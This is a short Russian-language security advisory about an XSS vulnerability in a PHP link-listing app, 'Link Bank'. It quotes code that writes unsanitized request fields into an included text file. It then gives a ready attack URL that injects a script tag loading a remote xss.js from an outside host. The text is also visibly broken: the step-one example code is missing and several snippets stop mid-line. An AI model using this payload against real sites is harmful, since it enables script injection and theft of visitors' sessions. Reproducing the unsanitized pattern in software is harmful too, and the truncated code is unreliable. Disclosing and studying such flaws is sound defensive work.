Компьютер для продвинутых пользоватлей Выпус по безопасности. Ошибка в Link Bank.
Компьютер для продвинутых
пользователей
Содержание:
Link Bank
ПО: Link Bank
Версия: n\a
Уязвимость:
Link Bank не санирует отправленные сообщения, что позволяет пользователю
вставить информацию, которую можно использовать в атакующих действиях.
После отправки информация переходит в текстовой файл с расширением .txt,
которые приложение читает и выполняет в виде ссылки. Этот недочет
позволяет проводить xss атаки.
В ./content/index.txt
include("links.txt");
?>
В ./content/add_link.txt:
$url_name = $_REQUEST['url_name'];
$url = $_REQUEST['url'];
$img = $_REQUEST['img'];
$filename = "content/links.txt";
$code = "$url_name ";
В ./iframe.php
Link Bank -
Использование:
1. Отправляем некоторый код, например .
2. XSS:
http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20src=http://notlegal.ws/xss.js%3E%3C/script%3E